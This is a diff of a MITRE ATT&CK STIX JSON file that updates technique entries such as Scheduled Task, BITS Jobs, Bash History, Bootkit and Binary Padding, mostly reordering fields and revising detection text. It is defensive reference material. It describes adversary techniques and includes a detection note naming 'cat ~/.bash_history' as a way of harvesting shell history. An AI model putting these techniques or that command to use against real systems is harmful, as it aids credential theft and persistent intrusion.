Scheduled task created\n* Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled\n* Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)\n\nRemote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.",
- "x_mitre_permissions_required": [
- "Administrator"
- ],
- "x_mitre_remote_support": true,
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
"x_mitre_data_sources": [
"File monitoring",
"Process command-line parameters",
"Process monitoring",
"Windows event logs"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_remote_support": true,
+ "x_mitre_permissions_required": [
+ "Administrator"
+ ],
+ "x_mitre_detection": "Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\\System32\\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.\n\nConfigure event logging for scheduled task creation and changes by enabling the \"Microsoft-Windows-TaskScheduler/Operational\" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10)\n\n* Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered\n* Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated\n* Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted\n* Event ID 4698 on Windows 10, Server 2016 - Scheduled task created\n* Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled\n* Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)\n\nRemote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.",
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -1863,23 +1877,24 @@
"phase_name": "collection"
}
],
- "modified": "2019-06-18T13:16:53.385Z",
+ "modified": "2020-07-14T19:42:10.235Z",
"created": "2017-05-31T21:31:34.528Z",
- "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.\n\nBehavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the microphone, recording devices, or recording software, and a process periodically writing files to disk that contain audio data.",
"x_mitre_data_sources": [
"API monitoring",
"Process monitoring",
"File monitoring"
],
- "x_mitre_detection": "Detection of this technique may be difficult due to the various APIs that may be used. Telemetry data regarding API use may not be useful depending on how a system is normally used, but may provide context to other potentially malicious activity occurring on a system.\n\nBehavior that could indicate technique use include an unknown or unusual process accessing APIs associated with devices or software that interact with the microphone, recording devices, or recording software, and a process periodically writing files to disk that contain audio data.",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ]
+ "x_mitre_version": "1.0"
},
{
"id": "attack-pattern--52d40641-c480-4ad5-81a3-c80ccaddf82d",
@@ -1954,25 +1969,35 @@
],
"modified": "2020-03-25T15:11:25.821Z",
"created": "2020-01-24T14:54:42.757Z",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_permissions_required": [
- "Administrator"
+ "x_mitre_platforms": [
+ "Windows"
],
- "x_mitre_detection": "Monitor the Registry for changes to the LSA Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned DLLs try to load into the LSA by setting the Registry key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\LSASS.exe with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)",
"x_mitre_data_sources": [
"DLL monitoring",
"Windows Registry",
"Loaded DLLs"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_detection": "Monitor the Registry for changes to the LSA Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned DLLs try to load into the LSA by setting the Registry key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\LSASS.exe with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)",
+ "x_mitre_permissions_required": [
+ "Administrator"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0"
},
{
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ "created": "2017-05-31T21:31:27.985Z",
+ "modified": "2020-03-31T22:18:43.019Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "collection"
+ }
],
+ "type": "attack-pattern",
+ "id": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Automated Collection",
+ "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools. \n\nThis technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570) to identify and move files.",
"external_references": [
{
"source_name": "mitre-attack",
@@ -1980,19 +2005,9 @@
"external_id": "T1119"
}
],
- "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of [Scripting](https://attack.mitre.org/techniques/T1064) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools. \n\nThis technique may incorporate use of other techniques such as [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) and [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) to identify and move files.",
- "name": "Automated Collection",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "id": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "collection"
- }
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "modified": "2019-07-16T19:44:07.942Z",
- "created": "2017-05-31T21:31:27.985Z",
"x_mitre_system_requirements": [
"Permissions to access directories and files that store information of interest."
],
@@ -2004,13 +2019,14 @@
"x_mitre_permissions_required": [
"User"
],
- "x_mitre_detection": "Depending on the method used, actions could include common file system commands and parameters on the command-line interface within batch files or scripts. A sequence of actions like this may be unusual, depending on the system and network environment. Automated collection may occur along with other techniques such as [Data Staged](https://attack.mitre.org/techniques/T1074). As such, file access monitoring that shows an unusual process performing sequential file opens and potentially copy actions to another location on the file system for many files at once may indicate automated collection behavior. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1086).",
+ "x_mitre_detection": "Depending on the method used, actions could include common file system commands and parameters on the command-line interface within batch files or scripts. A sequence of actions like this may be unusual, depending on the system and network environment. Automated collection may occur along with other techniques such as [Data Staged](https://attack.mitre.org/techniques/T1074). As such, file access monitoring that shows an unusual process performing sequential file opens and potentially copy actions to another location on the file system for many files at once may indicate automated collection behavior. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
"x_mitre_data_sources": [
"File monitoring",
"Data loss prevention",
"Process command-line parameters"
],
- "x_mitre_version": "1.0"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": false
},
{
"id": "attack-pattern--774a3188-6ba9-4dc4-879d-d54ee48a5ce9",
@@ -2036,20 +2052,20 @@
],
"modified": "2020-03-11T13:58:08.219Z",
"created": "2017-05-31T21:30:29.458Z",
- "x_mitre_version": "1.1",
- "x_mitre_data_sources": [
- "File monitoring",
- "Process monitoring",
- "Process use of network"
- ],
- "x_mitre_detection": "Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious.",
- "x_mitre_network_requirements": true,
+ "x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_network_requirements": true,
+ "x_mitre_detection": "Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious.",
+ "x_mitre_data_sources": [
+ "File monitoring",
+ "Process monitoring",
+ "Process use of network"
+ ],
+ "x_mitre_version": "1.1"
},
{
"id": "attack-pattern--c8e87b83-edbb-48d4-9295-4974897525b7",
@@ -2119,10 +2135,19 @@
],
"modified": "2020-03-25T23:28:10.049Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
- "x_mitre_contributors": [
- "Ricardo Dias",
- "Red Canary"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator",
+ "SYSTEM"
+ ],
+ "x_mitre_detection": "BITS runs as a service and its status can be checked with the Sc query utility (sc query bits). (Citation: Microsoft Issues with BITS July 2011) Active BITS tasks can be enumerated using the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (bitsadmin /list /allusers /verbose). (Citation: Microsoft BITS)\n\nMonitor usage of the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (especially the \u2018Transfer\u2019, 'Create', 'AddFile', 'SetNotifyFlags', 'SetNotifyCmdLine', 'SetMinRetryDelay', 'SetCustomHeaders', and 'Resume' command options) (Citation: Microsoft BITS)Admin and the Windows Event log for BITS activity. Also consider investigating more detailed information about jobs by parsing the BITS job database. (Citation: CTU BITS Malware June 2016)\n\nMonitor and analyze network activity generated by BITS. BITS jobs use HTTP(S) and SMB for remote connections and are tethered to the creating user and will only function when that user is logged on (this rule applies even if a user attaches the job to a service account). (Citation: Microsoft BITS)",
+ "x_mitre_defense_bypassed": [
+ "Firewall",
+ "Host forensic analysis"
],
"x_mitre_data_sources": [
"Process monitoring",
@@ -2130,60 +2155,11 @@
"Packet capture",
"Windows event logs"
],
- "x_mitre_defense_bypassed": [
- "Firewall",
- "Host forensic analysis"
+ "x_mitre_contributors": [
+ "Ricardo Dias",
+ "Red Canary"
],
- "x_mitre_detection": "BITS runs as a service and its status can be checked with the Sc query utility (sc query bits). (Citation: Microsoft Issues with BITS July 2011) Active BITS tasks can be enumerated using the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (bitsadmin /list /allusers /verbose). (Citation: Microsoft BITS)\n\nMonitor usage of the [BITSAdmin](https://attack.mitre.org/software/S0190) tool (especially the \u2018Transfer\u2019, 'Create', 'AddFile', 'SetNotifyFlags', 'SetNotifyCmdLine', 'SetMinRetryDelay', 'SetCustomHeaders', and 'Resume' command options) (Citation: Microsoft BITS)Admin and the Windows Event log for BITS activity. Also consider investigating more detailed information about jobs by parsing the BITS job database. (Citation: CTU BITS Malware June 2016)\n\nMonitor and analyze network activity generated by BITS. BITS jobs use HTTP(S) and SMB for remote connections and are tethered to the creating user and will only function when that user is logged on (this rule applies even if a user attaches the job to a service account). (Citation: Microsoft BITS)",
- "x_mitre_permissions_required": [
- "User",
- "Administrator",
- "SYSTEM"
- ],
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": false
- },
- {
- "external_references": [
- {
- "source_name": "mitre-attack",
- "external_id": "T1059.004",
- "url": "https://attack.mitre.org/techniques/T1059/004"
- }
- ],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Bash",
- "description": "Adversaries may abuse Bash commands and scripts for execution. Bash, the primary macOS (through Mojave) and Linux shell, can control every aspect of a system, with certain commands requiring elevated privileges. \n\nBash scripts (.sh) provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of Bash scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.",
- "id": "attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "execution"
- }
- ],
- "modified": "2020-03-28T17:06:19.681Z",
- "created": "2020-03-09T14:15:05.330Z",
- "x_mitre_platforms": [
- "macOS",
- "Linux"
- ],
- "x_mitre_data_sources": [
- "Process monitoring",
- "Process command-line parameters"
- ],
- "x_mitre_detection": "Bash usage may be common on administrator, developer, or power user systems, depending on job function. If scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\n\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script. ",
- "x_mitre_permissions_required": [
- "User",
- "root"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -2234,23 +2210,39 @@
],
"modified": "2020-02-07T20:48:49.878Z",
"created": "2020-02-04T13:02:11.685Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
],
+ "x_mitre_detection": "Monitoring when the user's .bash_history is read can help alert to suspicious activity. While users do typically rely on their history of commands, they often access this history through other utilities like \"history\" instead of commands like cat ~/.bash_history.",
"x_mitre_data_sources": [
"Process command-line parameters",
"Process monitoring",
"File monitoring"
],
- "x_mitre_detection": "Monitoring when the user's .bash_history is read can help alert to suspicious activity. While users do typically rely on their history of commands, they often access this history through other utilities like \"history\" instead of commands like cat ~/.bash_history.",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS"
+ ]
},
{
+ "created": "2020-03-14T22:34:03.024Z",
+ "modified": "2020-03-26T23:15:47.861Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "command-and-control"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--be055942-6e63-49d7-9fa1-9cb7d8a8f3f4",
+ "description": "Adversaries may use an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems can then send the output from those commands back over that Web service channel. The return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull request to development project, updating a document hosted on a Web service, or by sending a Tweet. \n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. ",
+ "name": "Bidirectional Communication",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -2263,22 +2255,6 @@
"source_name": "University of Birmingham C2"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Bidirectional Communication",
- "description": "Adversaries may use an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems can then send the output from those commands back over that Web service channel. The return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull request to development project, updating a document hosted on a Web service, or by sending a Tweet. \n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. ",
- "id": "attack-pattern--be055942-6e63-49d7-9fa1-9cb7d8a8f3f4",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "command-and-control"
- }
- ],
- "modified": "2020-03-26T23:15:47.861Z",
- "created": "2020-03-14T22:34:03.024Z",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -2334,13 +2310,6 @@
"created": "2017-05-31T21:30:22.096Z"
},
{
- "id": "attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5",
- "description": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations. \n\nBinary padding effectively changes the checksum of the file and can also be used to avoid hash-based blacklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ) ",
- "name": "Binary Padding",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -2368,6 +2337,13 @@
"description": "VirusTotal. (n.d.). VirusTotal FAQ. Retrieved May 23, 2019."
}
],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Binary Padding",
+ "description": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This can be done without affecting the functionality or behavior of a binary, but can increase the size of the binary beyond what some security tools are capable of handling due to file size limitations. \n\nBinary padding effectively changes the checksum of the file and can also be used to avoid hash-based blocklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limits the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ) ",
+ "id": "attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5",
"type": "attack-pattern",
"kill_chain_phases": [
{
@@ -2375,7 +2351,7 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-29T20:49:04.050Z",
+ "modified": "2020-06-20T20:50:48.023Z",
"created": "2020-02-05T14:04:25.865Z",
"x_mitre_contributors": [
"Martin Jirkal, ESET"
@@ -2455,21 +2431,21 @@
"phase_name": "privilege-escalation"
}
],
- "modified": "2020-03-25T19:47:43.546Z",
+ "modified": "2020-06-30T21:23:15.683Z",
"created": "2020-01-23T17:46:59.535Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_detection": "Monitor for additions or modifications of mechanisms that could be used to trigger autostart execution, such as relevant additions to the Registry. Look for changes that are not correlated with known updates, patches, or other planned administrative activity. Tools such as Sysinternals Autoruns may also be used to detect system autostart configuration changes that could be attempts at persistence.(Citation: TechNet Autoruns) Changes to some autostart configuration settings may happen under normal conditions when legitimate software is installed. \n\nSuspicious program execution as autostart programs may show up as outlier processes that have not been seen before when compared against historical data.To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n\nMonitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Look for abnormal process behavior that may be due to a process loading a malicious DLL.\n\nMonitor for abnormal usage of utilities and command-line parameters involved in kernel modification or driver installation.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": false,
"x_mitre_permissions_required": [
"User",
"Administrator",
"root"
],
- "x_mitre_is_subtechnique": false,
- "x_mitre_version": "1.0"
+ "x_mitre_detection": "Monitor for additions or modifications of mechanisms that could be used to trigger autostart execution, such as relevant additions to the Registry. Look for changes that are not correlated with known updates, patches, or other planned administrative activity. Tools such as Sysinternals Autoruns may also be used to detect system autostart configuration changes that could be attempts at persistence.(Citation: TechNet Autoruns) Changes to some autostart configuration settings may happen under normal conditions when legitimate software is installed. \n\nSuspicious program execution as autostart programs may show up as outlier processes that have not been seen before when compared against historical data.To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n\nMonitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Look for abnormal process behavior that may be due to a process loading a malicious DLL.\n\nMonitor for abnormal usage of utilities and command-line parameters involved in kernel modification or driver installation.",
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"id": "attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334",
@@ -2504,17 +2480,17 @@
],
"modified": "2020-03-27T16:49:15.953Z",
"created": "2017-05-31T21:30:38.910Z",
- "x_mitre_version": "2.0",
- "x_mitre_data_sources": [
- "File monitoring",
- "Process monitoring"
- ],
- "x_mitre_detection": "Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties. Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.",
+ "x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"macOS",
"Windows"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_detection": "Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties. Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.",
+ "x_mitre_data_sources": [
+ "File monitoring",
+ "Process monitoring"
+ ],
+ "x_mitre_version": "2.0"
},
{
"id": "attack-pattern--02fefddc-fb1b-423f-a76b-7552dd211d4d",
@@ -2549,9 +2525,9 @@
"url": "https://attack.mitre.org/techniques/T1542/003"
},
{
- "url": "https://www.fireeye.com/content/dam/fireeye-www/regional/fr_FR/offers/pdfs/ig-mtrends-2016.pdf",
- "description": "Mandiant. (2016, February). M-Trends 2016. Retrieved January 4, 2017.",
- "source_name": "MTrends 2016"
+ "source_name": "Mandiant M Trends 2016",
+ "url": "https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf",
+ "description": "Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved March 5, 2019."
},
{
"url": "http://www.symantec.com/connect/blogs/are-mbr-infections-back-fashion",
@@ -2564,7 +2540,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Bootkit",
- "description": "Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.\n\nA bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: MTrends 2016) The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011)\n\nThe MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.",
+ "description": "Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.\n\nA bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). (Citation: Mandiant M Trends 2016) The MBR is the section of disk that is first loaded after completing hardware initialization by the BIOS. It is the location of the boot loader. An adversary who has raw access to the boot drive may overwrite this area, diverting execution during startup from the normal boot loader to adversary code. (Citation: Lau 2011)\n\nThe MBR passes control of the boot process to the VBR. Similar to the case of MBR, an adversary who has raw access to the boot drive may overwrite the VBR to divert execution during startup to adversary code.",
"id": "attack-pattern--1b7b1806-7746-41a1-a35d-e48dae25ddba",
"type": "attack-pattern",
"kill_chain_phases": [
@@ -2577,28 +2553,28 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-23T23:43:32.353Z",
+ "modified": "2020-05-07T22:32:05.335Z",
"created": "2019-12-19T21:05:38.123Z",
- "x_mitre_platforms": [
- "Linux",
- "Windows"
+ "x_mitre_defense_bypassed": [
+ "Host intrusion prevention systems",
+ "Anti-virus",
+ "File monitoring"
],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "SYSTEM"
+ ],
+ "x_mitre_detection": "Perform integrity checking on MBR and VBR. Take snapshots of MBR and VBR and compare against known good samples. Report changes to MBR and VBR as they occur for indicators of suspicious activity and further analysis.",
"x_mitre_data_sources": [
"VBR",
"MBR",
"API monitoring"
],
- "x_mitre_detection": "Perform integrity checking on MBR and VBR. Take snapshots of MBR and VBR and compare against known good samples. Report changes to MBR and VBR as they occur for indicators of suspicious activity and further analysis.",
- "x_mitre_permissions_required": [
- "Administrator",
- "SYSTEM"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_defense_bypassed": [
- "Host intrusion prevention systems",
- "Anti-virus",
- "File monitoring"
+ "x_mitre_platforms": [
+ "Linux",
+ "Windows"
]
},
{
@@ -2625,26 +2601,26 @@
],
"modified": "2020-03-26T16:06:07.367Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.0",
- "x_mitre_contributors": [
- "Mike Kemmerer"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Linux",
+ "Windows",
+ "macOS"
],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Monitor processes and command-line arguments for actions that could be taken to gather browser bookmark information. Remote access tools with built-in features may interact directly using APIs to gather information. Information may also be acquired through system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nSystem and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained.",
"x_mitre_data_sources": [
"API monitoring",
"File monitoring",
"Process command-line parameters",
"Process monitoring"
],
- "x_mitre_detection": "Monitor processes and command-line arguments for actions that could be taken to gather browser bookmark information. Remote access tools with built-in features may interact directly using APIs to gather information. Information may also be acquired through system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nSystem and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained.",
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_contributors": [
+ "Mike Kemmerer"
],
- "x_mitre_platforms": [
- "Linux",
- "Windows",
- "macOS"
- ],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "1.0"
},
{
"id": "attack-pattern--389735f1-f21c-4208-b8f0-f8031e7169b8",
@@ -2715,10 +2691,16 @@
],
"modified": "2020-03-25T23:36:30.565Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.1",
- "x_mitre_contributors": [
- "Justin Warner, ICEBRG"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
